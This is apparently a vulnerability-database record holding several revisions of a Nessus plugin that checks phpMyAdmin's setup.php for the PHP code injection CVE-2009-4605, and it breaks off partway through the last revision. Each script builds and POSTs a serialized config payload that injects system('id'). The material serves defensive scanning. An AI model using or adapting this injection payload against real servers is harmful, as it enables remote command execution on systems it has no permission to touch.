{"id": "PHPMYADMIN_PMASA_2010_3.NASL", "bulletinFamily": "scanner", "title": "phpMyAdmin setup.php unserialize() Arbitrary PHP Code Execution (PMASA-2010-3)", "description": "The setup script included with the version of phpMyAdmin installed on\nthe remote host does not properly sanitize user-supplied input before\nusing it to generate a config file for the application. Submitting a\nspecially crafted POST request can result in arbitrary PHP code\ninjection.\n\nA remote attacker could exploit this issue in a cross-site request\nforgery attack, which could be used to execute arbitrary commands\non the system with the privileges of the web server.", "published": "2010-01-27T00:00:00", "modified": "2020-02-02T00:00:00", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:P/A:N"}, "href": "https://www.tenable.com/plugins/nessus/44324", "reporter": "This script is Copyright (C) 2010-2018 Tenable Network Security, Inc.", "references": ["https://www.phpmyadmin.net/security/PMASA-2010-3/"], "cvelist": ["CVE-2009-4605"], "type": "nessus", "lastseen": "2020-02-01T01:41:45", "history": [{"bulletin": {"bulletinFamily": "scanner", "cpe": ["cpe:/a:phpmyadmin:phpmyadmin"], "cvelist": ["CVE-2009-4605"], "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:P/A:N"}, "description": "The setup script included with the version of phpMyAdmin installed on\nthe remote host does not properly sanitize user-supplied input before\nusing it to generate a config file for the application. Submitting a\nspecially crafted POST request can result in arbitrary PHP code\ninjection.\n\nA remote attacker could exploit this issue in a cross-site request\nforgery attack, which could be used to execute arbitrary commands\non the system with the privileges of the web server.", "edition": 12, "enchantments": {"dependencies": {"modified": "2020-01-01T01:12:49", "references": [{"idList": ["SSV:18972"], "type": "seebug"}, {"idList": ["DEBIAN:DSA-2034-1:622E3"], "type": "debian"}, {"idList": ["PHPMYADMIN:PMASA-2010-3"], "type": "phpmyadmin"}, {"idList": ["CVE-2009-4605"], "type": "cve"}, {"idList": ["SUSE_11_0_PHPMYADMIN-091209.NASL", "DEBIAN_DSA-2034.NASL"], "type": "nessus"}, {"idList": ["OPENVAS:67338", "OPENVAS:136141256231067338", "OPENVAS:1361412562310100589"], "type": "openvas"}]}, "score": {"modified": "2020-01-01T01:12:49", "value": 7.6, "vector": "NONE"}}, "hash": "3f6c3b5719f1057a6e17e09e6a5e41395a8480ed17e48fd3cf3136746fea01ec", "hashmap": [{"hash": "14e733c11363439b9bec6bf9c48f972c", "key": "sourceData"}, {"hash": "b5bbdd851ff7634dd01c09e00d03be1e", "key": "cvss"}, {"hash": "e2f82ebe32f4f00f604292ef7c12b5d1", "key": "title"}, {"hash": "df07826cb9568f42b41e100c569903e2", "key": "cvelist"}, {"hash": "625f66b220dbcca95ae964c660cb5883", "key": "cpe"}, {"hash": "2249940a684898a70237266de5d6dd6c", "key": "modified"}, {"hash": "c568b86ab2f9135262f92f00a89c6a88", "key": "published"}, {"hash": "03db36597b98092613edba567eb84b31", "key": "reporter"}, {"hash": "d1b191fd24b45711cc736ac73202e8f2", "key": "href"}, {"hash": "bbdaea376f500d25f6b0c1050311dd07", "key": "bulletinFamily"}, {"hash": "5e0bd03bec244039678f2b955a2595aa", "key": "type"}, {"hash": "07948b8ff59e8dda0b01012f70f00327", "key": "naslFamily"}, {"hash": "4a2dcbdbd245f176c09d80ac3f56f340", "key": "pluginID"}, {"hash": "1e680a3aecedfc0b9aa705a5e591a170", "key": "references"}, {"hash": "e2e9af6ce69aab43634635bd3d257969", "key": "description"}], "history": [], "href": "https://www.tenable.com/plugins/nessus/44324", "id": "PHPMYADMIN_PMASA_2010_3.NASL", "lastseen": "2020-01-01T01:12:49", "modified": "2020-01-02T00:00:00", "naslFamily": "CGI abuses", "objectVersion": "1.3", "pluginID": "44324", "published": "2010-01-27T00:00:00", "references": ["https://www.phpmyadmin.net/security/PMASA-2010-3/"], "reporter": "This script is Copyright (C) 2010-2018 Tenable Network Security, Inc.", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\n\ninclude(\"compat.inc\");\n\n\nif (description)\n{\n script_id(44324);\n script_version(\"1.10\");\n script_cvs_date(\"Date: 2018/11/15 20:50:18\");\n\n script_cve_id(\"CVE-2009-4605\");\n script_bugtraq_id(37861);\n script_xref(name:\"Secunia\", value:\"38211\");\n\n script_name(english:\"phpMyAdmin setup.php unserialize() Arbitrary PHP Code Execution (PMASA-2010-3)\");\n script_summary(english:\"Checks if code can be injected into the config file\");\n\n script_set_attribute(\n attribute:\"synopsis\",\n value:\n\"The remote web server contains a PHP application that may allow\nexecution of arbitrary code.\"\n );\n script_set_attribute(\n attribute:\"description\",\n value:\n\"The setup script included with the version of phpMyAdmin installed on\nthe remote host does not properly sanitize user-supplied input before\nusing it to generate a config file for the application. Submitting a\nspecially crafted POST request can result in arbitrary PHP code\ninjection.\n\nA remote attacker could exploit this issue in a cross-site request\nforgery attack, which could be used to execute arbitrary commands\non the system with the privileges of the web server.\"\n );\n script_set_attribute(attribute:\"see_also\", value:\"https://www.phpmyadmin.net/security/PMASA-2010-3/\");\n script_set_attribute(attribute:\"solution\", value:\"Upgrade to phpMyAdmin 2.11.10 / 3.0.0 or later.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No exploit is required\");\n script_set_attribute(attribute:\"exploit_available\", value:\"false\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2010/01/15\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2010/01/15\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2010/01/27\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:phpmyadmin:phpmyadmin\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"CGI abuses\");\n\n script_copyright(english:\"This script is Copyright (C) 2010-2018 Tenable Network Security, Inc.\");\n\n script_dependencies(\"phpMyAdmin_detect.nasl\");\n script_exclude_keys(\"Settings/disable_cgi_scanning\");\n script_require_ports(\"Services/www\", 80);\n script_require_keys(\"www/phpMyAdmin\", \"www/PHP\");\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"http.inc\");\ninclude(\"webapp_func.inc\");\ninclude(\"url_func.inc\");\n\n\nport = get_http_port(default:80, php:TRUE);\ninstall = get_install_from_kb(appname:'phpMyAdmin', port:port, exit_on_fail:TRUE);\n\n# The first request makes sure the page exists, the PMA config is writeable,\n# and extracts the token\nurl = install['dir']+'/scripts/setup.php';\nres = http_send_recv3(method:\"GET\", item:url, port:port, exit_on_fail:TRUE);\n\n# If the config can't be written to disk, this cannot be exploited - even\n# if the software is unpatched. In which case, only continue if paranoid.\nif ('Can not load or save configuration' >< res[2])\n{\n if (report_paranoia < 2)\n exit(1, 'The phpMyAdmin install at '+build_url(qs:install['dir']+'/', port:port)+' might be unpatched, but cannot be exploited.');\n else\n config_writeable = FALSE;\n}\nelse config_writeable = TRUE;\n\n# Extract the token.\ntoken = NULL;\npat = 'input type=\"hidden\" name=\"token\" value=\"([^\"]+)\"';\nmatch = eregmatch(string:res[2], pattern:pat);\nif (match) token = match[1];\nelse exit(1, \"Unable to extract token from \"+build_url(qs:url, port:port));\n\n# The second request determines if PHP code can be injected into the config file\ncmd = 'id';\narray_name = \"TNS\";\ninj_code = SCRIPT_NAME+\"'] = \"+unixtime()+\"; system('\"+cmd+\"'); //\";\nexpected_out = \"$cfg['Servers'][$i]['\"+array_name+\"']['\" + inj_code;\nconfig=\n 'a:1:{'+\n 's:7:\"Servers\";'+\n 'a:1:{'+\n 'i:0;'+\n 'a:1:{'+\n 's:'+strlen(array_name)+':\"'+array_name+'\";'+\n 'a:1:{'+\n 's:'+strlen(inj_code)+':\"'+inj_code+'\";'+\n 's:0:\"\";'+\n '}'+\n '}'+\n '}'+\n '}';\npostdata =\n 'token='+token+'&'+\n 'action=download&'+\n 'configuration='+urlencode(str:config);\nres = http_send_recv3(\n method:\"POST\",\n item:url,\n port:port,\n data:postdata,\n content_type:\"application/x-www-form-urlencoded\",\n exit_on_fail:TRUE\n);\n\nif (expected_out >< res[2])\n{\n if (!config_writeable)\n {\n report =\n '\\nEven though the software is unpatched, the web server does not\\n'+\n 'have permission to write the configuration file to disk, which\\n'+\n 'means the vulnerability cannot be exploited at this time.\\n';\n security_hole(port:port, extra:report);\n }\n else security_hole(port);\n}\nelse\n{\n full_url = build_url(qs:install['dir']+'/', port:port);\n exit(0, 'The phpMyAdmin install at '+full_url+' is not affected.');\n}\n", "title": "phpMyAdmin setup.php unserialize() Arbitrary PHP Code Execution (PMASA-2010-3)", "type": "nessus", "viewCount": 5}, "differentElements": ["modified"], "edition": 12, "lastseen": "2020-01-01T01:12:49"}, {"bulletin": {"bulletinFamily": "scanner", "cpe": ["cpe:/a:phpmyadmin:phpmyadmin"], "cvelist": ["CVE-2009-4605"], "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:PARTIAL/A:NONE/"}, "description": "The setup script included with the version of phpMyAdmin installed on the remote host does not properly sanitize user-supplied input before using it to generate a config file for the application. Submitting a specially crafted POST request can result in arbitrary PHP code injection.\n\nA remote attacker could exploit this issue in a cross-site request forgery attack, which could be used to execute arbitrary commands on the system with the privileges of the web server.", "edition": 5, "enchantments": {"score": {"value": 7.5, "vector": "NONE"}}, "hash": "e92028682270d42108a9ffc9f8845eb09d2c9e7138c9dc34a391618eeae76d9a", "hashmap": [{"hash": "4e9ff411278dd1e0a2396e82da16469b", "key": "modified"}, {"hash": "e2f82ebe32f4f00f604292ef7c12b5d1", "key": "title"}, {"hash": "df07826cb9568f42b41e100c569903e2", "key": "cvelist"}, {"hash": "625f66b220dbcca95ae964c660cb5883", "key": "cpe"}, {"hash": "9cf00d658b687f030ebe173a0528c567", "key": "reporter"}, {"hash": "c568b86ab2f9135262f92f00a89c6a88", "key": "published"}, {"hash": "26769fd423968d45be7383413e2552f1", "key": "cvss"}, {"hash": "47af08ad97148c117568258e69b69123", "key": "sourceData"}, {"hash": "1a6ed6fef49ad1cd2a9ff0f83967cd63", "key": "references"}, {"hash": "bbdaea376f500d25f6b0c1050311dd07", "key": "bulletinFamily"}, {"hash": "5e0bd03bec244039678f2b955a2595aa", "key": "type"}, {"hash": "07948b8ff59e8dda0b01012f70f00327", "key": "naslFamily"}, {"hash": "4a2dcbdbd245f176c09d80ac3f56f340", "key": "pluginID"}, {"hash": "4356f9674f9e8077781321f4ba679e31", "key": "href"}, {"hash": "a252701a32e43adc64ece9e2459d8495", "key": "description"}], "history": [], "href": "https://www.tenable.com/plugins/index.php?view=single&id=44324", "id": "PHPMYADMIN_PMASA_2010_3.NASL", "lastseen": "2018-09-01T23:41:42", "modified": "2018-07-24T00:00:00", "naslFamily": "CGI abuses", "objectVersion": "1.3", "pluginID": "44324", "published": "2010-01-27T00:00:00", "references": ["http://www.phpmyadmin.net/home_page/security/PMASA-2010-3.php"], "reporter": "Tenable", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\n\ninclude(\"compat.inc\");\n\n\nif (description)\n{\n script_id(44324);\n script_version(\"1.9\");\n script_cvs_date(\"Date: 2018/07/24 18:56:11\");\n\n script_cve_id(\"CVE-2009-4605\");\n script_bugtraq_id(37861);\n script_xref(name:\"Secunia\", value:\"38211\");\n\n script_name(english:\"phpMyAdmin setup.php unserialize() Arbitrary PHP Code Execution (PMASA-2010-3)\");\n script_summary(english:\"Checks if code can be injected into the config file\");\n\n script_set_attribute(\n attribute:\"synopsis\",\n value:\n\"The remote web server contains a PHP application that may allow\nexecution of arbitrary code.\"\n );\n script_set_attribute(\n attribute:\"description\",\n value:\n\"The setup script included with the version of phpMyAdmin installed on\nthe remote host does not properly sanitize user-supplied input before\nusing it to generate a config file for the application. Submitting a\nspecially crafted POST request can result in arbitrary PHP code\ninjection.\n\nA remote attacker could exploit this issue in a cross-site request\nforgery attack, which could be used to execute arbitrary commands\non the system with the privileges of the web server.\"\n );\n script_set_attribute(attribute:\"see_also\", value:\"http://www.phpmyadmin.net/home_page/security/PMASA-2010-3.php\");\n script_set_attribute(attribute:\"solution\", value:\"Upgrade to phpMyAdmin 2.11.10 / 3.0.0 or later.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No exploit is required\");\n script_set_attribute(attribute:\"exploit_available\", value:\"false\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2010/01/15\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2010/01/15\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2010/01/27\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:phpmyadmin:phpmyadmin\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"CGI abuses\");\n\n script_copyright(english:\"This script is Copyright (C) 2010-2018 Tenable Network Security, Inc.\");\n\n script_dependencies(\"phpMyAdmin_detect.nasl\");\n script_exclude_keys(\"Settings/disable_cgi_scanning\");\n script_require_ports(\"Services/www\", 80);\n script_require_keys(\"www/phpMyAdmin\", \"www/PHP\");\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"http.inc\");\ninclude(\"webapp_func.inc\");\ninclude(\"url_func.inc\");\n\n\nport = get_http_port(default:80, php:TRUE);\ninstall = get_install_from_kb(appname:'phpMyAdmin', port:port, exit_on_fail:TRUE);\n\n# The first request makes sure the page exists, the PMA config is writeable,\n# and extracts the token\nurl = install['dir']+'/scripts/setup.php';\nres = http_send_recv3(method:\"GET\", item:url, port:port, exit_on_fail:TRUE);\n\n# If the config can't be written to disk, this cannot be exploited - even\n# if the software is unpatched. In which case, only continue if paranoid.\nif ('Can not load or save configuration' >< res[2])\n{\n if (report_paranoia < 2)\n exit(1, 'The phpMyAdmin install at '+build_url(qs:install['dir']+'/', port:port)+' might be unpatched, but cannot be exploited.');\n else\n config_writeable = FALSE;\n}\nelse config_writeable = TRUE;\n\n# Extract the token.\ntoken = NULL;\npat = 'input type=\"hidden\" name=\"token\" value=\"([^\"]+)\"';\nmatch = eregmatch(string:res[2], pattern:pat);\nif (match) token = match[1];\nelse exit(1, \"Unable to extract token from \"+build_url(qs:url, port:port));\n\n# The second request determines if PHP code can be injected into the config file\ncmd = 'id';\narray_name = \"TNS\";\ninj_code = SCRIPT_NAME+\"'] = \"+unixtime()+\"; system('\"+cmd+\"'); //\";\nexpected_out = \"$cfg['Servers'][$i]['\"+array_name+\"']['\" + inj_code;\nconfig=\n 'a:1:{'+\n 's:7:\"Servers\";'+\n 'a:1:{'+\n 'i:0;'+\n 'a:1:{'+\n 's:'+strlen(array_name)+':\"'+array_name+'\";'+\n 'a:1:{'+\n 's:'+strlen(inj_code)+':\"'+inj_code+'\";'+\n 's:0:\"\";'+\n '}'+\n '}'+\n '}'+\n '}';\npostdata =\n 'token='+token+'&'+\n 'action=download&'+\n 'configuration='+urlencode(str:config);\nres = http_send_recv3(\n method:\"POST\",\n item:url,\n port:port,\n data:postdata,\n content_type:\"application/x-www-form-urlencoded\",\n exit_on_fail:TRUE\n);\n\nif (expected_out >< res[2])\n{\n if (!config_writeable)\n {\n report =\n '\\nEven though the software is unpatched, the web server does not\\n'+\n 'have permission to write the configuration file to disk, which\\n'+\n 'means the vulnerability cannot be exploited at this time.\\n';\n security_hole(port:port, extra:report);\n }\n else security_hole(port);\n}\nelse\n{\n full_url = build_url(qs:install['dir']+'/', port:port);\n exit(0, 'The phpMyAdmin install at '+full_url+' is not affected.');\n}\n", "title": "phpMyAdmin setup.php unserialize() Arbitrary PHP Code Execution (PMASA-2010-3)", "type": "nessus", "viewCount": 2}, "differentElements": ["references", "modified", "sourceData"], "edition": 5, "lastseen": "2018-09-01T23:41:42"}, {"bulletin": {"bulletinFamily": "scanner", "cpe": [], "cvelist": ["CVE-2009-4605"], "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:PARTIAL/A:NONE/"}, "description": "The setup script included with the version of phpMyAdmin installed on the remote host does not properly sanitize user-supplied input before using it to generate a config file for the application. Submitting a specially crafted POST request can result in arbitrary PHP code injection.\n\nA remote attacker could exploit this issue in a cross-site request forgery attack, which could be used to execute arbitrary commands on the system with the privileges of the web server.", "edition": 1, "enchantments": {}, "hash": "c8270a8e624f10ca5758ae30d0c0e1db36f2b2521b4048c19ec0dbd64bdb445a", "hashmap": [{"hash": "e2f82ebe32f4f00f604292ef7c12b5d1", "key": "title"}, {"hash": "df07826cb9568f42b41e100c569903e2", "key": "cvelist"}, {"hash": "9cf00d658b687f030ebe173a0528c567", "key": "reporter"}, {"hash": "c568b86ab2f9135262f92f00a89c6a88", "key": "published"}, {"hash": "26769fd423968d45be7383413e2552f1", "key": "cvss"}, {"hash": "1a6ed6fef49ad1cd2a9ff0f83967cd63", "key": "references"}, {"hash": "bbdaea376f500d25f6b0c1050311dd07", "key": "bulletinFamily"}, {"hash": "5e0bd03bec244039678f2b955a2595aa", "key": "type"}, {"hash": "07948b8ff59e8dda0b01012f70f00327", "key": "naslFamily"}, {"hash": "4a2dcbdbd245f176c09d80ac3f56f340", "key": "pluginID"}, {"hash": "4356f9674f9e8077781321f4ba679e31", "key": "href"}, {"hash": "90f9eb679fab9f78dcde00987ce2347f", "key": "sourceData"}, {"hash": "a252701a32e43adc64ece9e2459d8495", "key": "description"}, {"hash": "1c362e980a0d97faa19e4a6d8bfcd4c6", "key": "modified"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cpe"}], "history": [], "href": "https://www.tenable.com/plugins/index.php?view=single&id=44324", "id": "PHPMYADMIN_PMASA_2010_3.NASL", "lastseen": "2016-09-26T17:24:08", "modified": "2014-08-09T00:00:00", "naslFamily": "CGI abuses", "objectVersion": "1.2", "pluginID": "44324", "published": "2010-01-27T00:00:00", "references": ["http://www.phpmyadmin.net/home_page/security/PMASA-2010-3.php"], "reporter": "Tenable", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\n\ninclude(\"compat.inc\");\n\n\nif (description)\n{\n script_id(44324);\n script_version(\"$Revision: 1.8 $\");\n script_cvs_date(\"$Date: 2014/08/09 00:11:24 $\");\n\n script_cve_id(\"CVE-2009-4605\");\n script_bugtraq_id(37861);\n script_osvdb_id(61861);\n script_xref(name:\"Secunia\", value:\"38211\");\n\n script_name(english:\"phpMyAdmin setup.php unserialize() Arbitrary PHP Code Execution (PMASA-2010-3)\");\n script_summary(english:\"Checks if code can be injected into the config file\");\n\n script_set_attribute(\n attribute:\"synopsis\",\n value:\n\"The remote web server contains a PHP application that may allow\nexecution of arbitrary code.\"\n );\n script_set_attribute(\n attribute:\"description\",\n value:\n\"The setup script included with the version of phpMyAdmin installed on\nthe remote host does not properly sanitize user-supplied input before\nusing it to generate a config file for the application. Submitting a\nspecially crafted POST request can result in arbitrary PHP code\ninjection.\n\nA remote attacker could exploit this issue in a cross-site request\nforgery attack, which could be used to execute arbitrary commands\non the system with the privileges of the web server.\"\n );\n script_set_attribute(attribute:\"see_also\", value:\"http://www.phpmyadmin.net/home_page/security/PMASA-2010-3.php\");\n script_set_attribute(attribute:\"solution\", value:\"Upgrade to phpMyAdmin 2.11.10 / 3.0.0 or later.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2010/01/15\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2010/01/15\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2010/01/27\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:phpmyadmin:phpmyadmin\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"CGI abuses\");\n\n script_copyright(english:\"This script is Copyright (C) 2010-2014 Tenable Network Security, Inc.\");\n\n script_dependencies(\"phpMyAdmin_detect.nasl\");\n script_exclude_keys(\"Settings/disable_cgi_scanning\");\n script_require_ports(\"Services/www\", 80);\n script_require_keys(\"www/phpMyAdmin\", \"www/PHP\");\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"http.inc\");\ninclude(\"webapp_func.inc\");\ninclude(\"url_func.inc\");\n\n\nport = get_http_port(default:80, php:TRUE);\ninstall = get_install_from_kb(appname:'phpMyAdmin', port:port, exit_on_fail:TRUE);\n\n# The first request makes sure the page exists, the PMA config is writeable,\n# and extracts the token\nurl = install['dir']+'/scripts/setup.php';\nres = http_send_recv3(method:\"GET\", item:url, port:port, exit_on_fail:TRUE);\n\n# If the config can't be written to disk, this cannot be exploited - even\n# if the software is unpatched. In which case, only continue if paranoid.\nif ('Can not load or save configuration' >< res[2])\n{\n if (report_paranoia < 2)\n exit(1, 'The phpMyAdmin install at '+build_url(qs:install['dir']+'/', port:port)+' might be unpatched, but cannot be exploited.');\n else\n config_writeable = FALSE;\n}\nelse config_writeable = TRUE;\n\n# Extract the token.\ntoken = NULL;\npat = 'input type=\"hidden\" name=\"token\" value=\"([^\"]+)\"';\nmatch = eregmatch(string:res[2], pattern:pat);\nif (match) token = match[1];\nelse exit(1, \"Unable to extract token from \"+build_url(qs:url, port:port));\n\n# The second request determines if PHP code can be injected into the config file\ncmd = 'id';\narray_name = \"TNS\";\ninj_code = SCRIPT_NAME+\"'] = \"+unixtime()+\"; system('\"+cmd+\"'); //\";\nexpected_out = \"$cfg['Servers'][$i]['\"+array_name+\"']['\" + inj_code;\nconfig=\n 'a:1:{'+\n 's:7:\"Servers\";'+\n 'a:1:{'+\n 'i:0;'+\n 'a:1:{'+\n 's:'+strlen(array_name)+':\"'+array_name+'\";'+\n 'a:1:{'+\n 's:'+strlen(inj_code)+':\"'+inj_code+'\";'+\n 's:0:\"\";'+\n '}'+\n '}'+\n '}'+\n '}';\npostdata =\n 'token='+token+'&'+\n 'action=download&'+\n 'configuration='+urlencode(str:config);\nres = http_send_recv3(\n method:\"POST\",\n item:url,\n port:port,\n data:postdata,\n content_type:\"application/x-www-form-urlencoded\",\n exit_on_fail:TRUE\n);\n\nif (expected_out >< res[2])\n{\n if (!config_writeable)\n {\n report =\n '\\nEven though the software is unpatched, the web server does not\\n'+\n 'have permission to write the configuration file to disk, which\\n'+\n 'means the vulnerability cannot be exploited at this time.\\n';\n security_hole(port:port, extra:report);\n }\n else security_hole(port);\n}\nelse\n{\n full_url = build_url(qs:install['dir']+'/', port:port);\n exit(0, 'The phpMyAdmin install at '+full_url+' is not affected.');\n}\n", "title": "phpMyAdmin setup.php unserialize() Arbitrary PHP Code Execution (PMASA-2010-3)", "type": "nessus", "viewCount": 1}, "differentElements": ["cpe"], "edition": 1, "lastseen": "2016-09-26T17:24:08"}, {"bulletin": {"bulletinFamily": "scanner", "cpe": ["cpe:/a:phpmyadmin:phpmyadmin"], "cvelist": ["CVE-2009-4605"], "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:PARTIAL/A:NONE/"}, "description": "The setup script included with the version of phpMyAdmin installed on the remote host does not properly sanitize user-supplied input before using it to generate a config file for the application. Submitting a specially crafted POST request can result in arbitrary PHP code injection.\n\nA remote attacker could exploit this issue in a cross-site request forgery attack, which could be used to execute arbitrary commands on the system with the privileges of the web server.", "edition": 6, "enchantments": {"score": {"value": 7.5, "vector": "NONE"}}, "hash": "70500c77acc97a017d95cd825bb262fa1df6871e1eb4c13ee40b2195110d5097", "hashmap": [{"hash": "14e733c11363439b9bec6bf9c48f972c", "key": "sourceData"}, {"hash": "e2f82ebe32f4f00f604292ef7c12b5d1", "key": "title"}, {"hash": "df07826cb9568f42b41e100c569903e2", "key": "cvelist"}, {"hash": "625f66b220dbcca95ae964c660cb5883", "key": "cpe"}, {"hash": "9cf00d658b687f030ebe173a0528c567", "key": "reporter"}, {"hash": "015cb78ce50d3bd4e2fbe18f25603329", "key": "modified"}, {"hash": "c568b86ab2f9135262f92f00a89c6a88", "key": "published"}, {"hash": "26769fd423968d45be7383413e2552f1", "key": "cvss"}, {"hash": "bbdaea376f500d25f6b0c1050311dd07", "key": "bulletinFamily"}, {"hash": "5e0bd03bec244039678f2b955a2595aa", "key": "type"}, {"hash": "07948b8ff59e8dda0b01012f70f00327", "key": "naslFamily"}, {"hash": "4a2dcbdbd245f176c09d80ac3f56f340", "key": "pluginID"}, {"hash": "4356f9674f9e8077781321f4ba679e31", "key": "href"}, {"hash": "1e680a3aecedfc0b9aa705a5e591a170", "key": "references"}, {"hash": "a252701a32e43adc64ece9e2459d8495", "key": "description"}], "history": [], "href": "https://www.tenable.com/plugins/index.php?view=single&id=44324", "id": "PHPMYADMIN_PMASA_2010_3.NASL", "lastseen": "2018-11-17T02:56:34", "modified": "2018-11-15T00:00:00", "naslFamily": "CGI abuses", "objectVersion": "1.3", "pluginID": "44324", "published": "2010-01-27T00:00:00", "references": ["https://www.phpmyadmin.net/security/PMASA-2010-3/"], "reporter": "Tenable", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\n\ninclude(\"compat.inc\");\n\n\nif (description)\n{\n script_id(44324);\n script_version(\"1.10\");\n script_cvs_date(\"Date: 2018/11/15 20:50:18\");\n\n script_cve_id(\"CVE-2009-4605\");\n script_bugtraq_id(37861);\n script_xref(name:\"Secunia\", value:\"38211\");\n\n script_name(english:\"phpMyAdmin setup.php unserialize() Arbitrary PHP Code Execution (PMASA-2010-3)\");\n script_summary(english:\"Checks if code can be injected into the config file\");\n\n script_set_attribute(\n attribute:\"synopsis\",\n value:\n\"The remote web server contains a PHP application that may allow\nexecution of arbitrary code.\"\n );\n script_set_attribute(\n attribute:\"description\",\n value:\n\"The setup script included with the version of phpMyAdmin installed on\nthe remote host does not properly sanitize user-supplied input before\nusing it to generate a config file for the application. Submitting a\nspecially crafted POST request can result in arbitrary PHP code\ninjection.\n\nA remote attacker could exploit this issue in a cross-site request\nforgery attack, which could be used to execute arbitrary commands\non the system with the privileges of the web server.\"\n );\n script_set_attribute(attribute:\"see_also\", value:\"https://www.phpmyadmin.net/security/PMASA-2010-3/\");\n script_set_attribute(attribute:\"solution\", value:\"Upgrade to phpMyAdmin 2.11.10 / 3.0.0 or later.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No exploit is required\");\n script_set_attribute(attribute:\"exploit_available\", value:\"false\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2010/01/15\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2010/01/15\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2010/01/27\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:phpmyadmin:phpmyadmin\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"CGI abuses\");\n\n script_copyright(english:\"This script is Copyright (C) 2010-2018 Tenable Network Security, Inc.\");\n\n script_dependencies(\"phpMyAdmin_detect.nasl\");\n script_exclude_keys(\"Settings/disable_cgi_scanning\");\n script_require_ports(\"Services/www\", 80);\n script_require_keys(\"www/phpMyAdmin\", \"www/PHP\");\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"http.inc\");\ninclude(\"webapp_func.inc\");\ninclude(\"url_func.inc\");\n\n\nport = get_http_port(default:80, php:TRUE);\ninstall = get_install_from_kb(appname:'phpMyAdmin', port:port, exit_on_fail:TRUE);\n\n# The first request makes sure the page exists, the PMA config is writeable,\n# and extracts the token\nurl = install['dir']+'/scripts/setup.php';\nres = http_send_recv3(method:\"GET\", item:url, port:port, exit_on_fail:TRUE);\n\n# If the config can't be written to disk, this cannot be exploited - even\n# if the software is unpatched. In which case, only continue if paranoid.\nif ('Can not load or save configuration' >< res[2])\n{\n if (report_paranoia < 2)\n exit(1, 'The phpMyAdmin install at '+build_url(qs:install['dir']+'/', port:port)+' might be unpatched, but cannot be exploited.');\n else\n config_writeable = FALSE;\n}\nelse config_writeable = TRUE;\n\n# Extract the token.\ntoken = NULL;\npat = 'input type=\"hidden\" name=\"token\" value=\"([^\"]+)\"';\nmatch = eregmatch(string:res[2], pattern:pat);\nif (match) token = match[1];\nelse exit(1, \"Unable to extract token from \"+build_url(qs:url, port:port));\n\n# The second request determines if PHP code can be injected into the config file\ncmd = 'id';\narray_name = \"TNS\";\ninj_code = SCRIPT_NAME+\"'] = \"+unixtime()+\"; system('\"+cmd+\"'); //\";\nexpected_out = 